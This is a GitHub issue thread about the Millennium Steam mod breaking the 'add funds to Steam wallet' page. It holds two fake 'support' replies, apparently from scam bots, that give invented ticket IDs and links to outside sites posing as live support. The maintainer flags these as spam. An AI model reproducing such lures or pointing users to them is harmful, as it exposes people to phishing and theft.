### ISSUE TITLE
Cant add funds to steam wallet

### ISSUE THREAD

**Issue by Chris31232** [shdwmtr/millennium#196]
### Before Reporting

- [X] I found no existing issues matching my bug
- [X] My issue is not caused by a theme
- [X] My issue is not caused by a plugin

### Describe the Bug

Trying to add funds to steam wallet just refreshes page. Uninstalled millennium and it worked fine, reinstalled and it broke. Cleared download cache and it was still broken.

### Expected Behavior

Expected to go to steams add funds checkout

### Steps To Reproduce

Open latest version of steam
Go to the add funds to steam wallet page
attempt to add funds
watch the page do absolutely nothing

### Operating System

Windows

**Comment by stanleyauthur67** [comment]
> ### Before Reporting
> * [x]  I found no existing issues matching my bug
> * [x]  My issue is not caused by a theme
> * [x]  My issue is not caused by a plugin
> 
> ### Describe the Bug
> Trying to add funds to steam wallet just refreshes page. Uninstalled millennium and it worked fine, reinstalled and it broke. Cleared download cache and it was still broken.
> 
> ### Expected Behavior
> Expected to go to steams add funds checkout
> 
> ### Steps To Reproduce
> Open latest version of steam Go to the add funds to steam wallet page attempt to add funds watch the page do absolutely nothing
> 
> ### Operating System
> Windows
> 
> ### Anything else?
> _No response_

Hello @Chris31232 
We sincerely apologize for the delay and any inconvenience this may have caused.

You’re experiencing transcript error,I attempted to reproduce your issue and was unable to do so.But it seems you must take immediate action to resolve your issue

We use GitHub issues as a place to track bugs and other development-related issues. If your issue persists, I’ll have to refer you to the official support live chat with the ticket ID STM0752131

Please see the link below to our dedicated support line:

[Steam Wallet Network DApps Support Ticket Requests.](https://dappsnodefix-xzx.pages.dev)

Alternatively, you can also search for an answer in our help documentation [HELP CENTER](https://dappsnodefix-xzx.pages.dev)

Note: Click on the chat icon at the bottom corner of the page to start a conversation

The issue here will be closed.

Thanks!

**Comment by Jason-Tariq** [comment]
Hello @Chris31232  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)

**Comment by shdwmtr** [comment]
Hopefully you didn't interact with any of the above messages, I've never had bots spamming fake "help".

Thanks for submitting the issue, I'll take a look into it.

**Comment by Sctter** [comment]
Can confirm this is happening to me too!!

**Comment by shdwmtr** [comment]
Should be fixed in the next update!
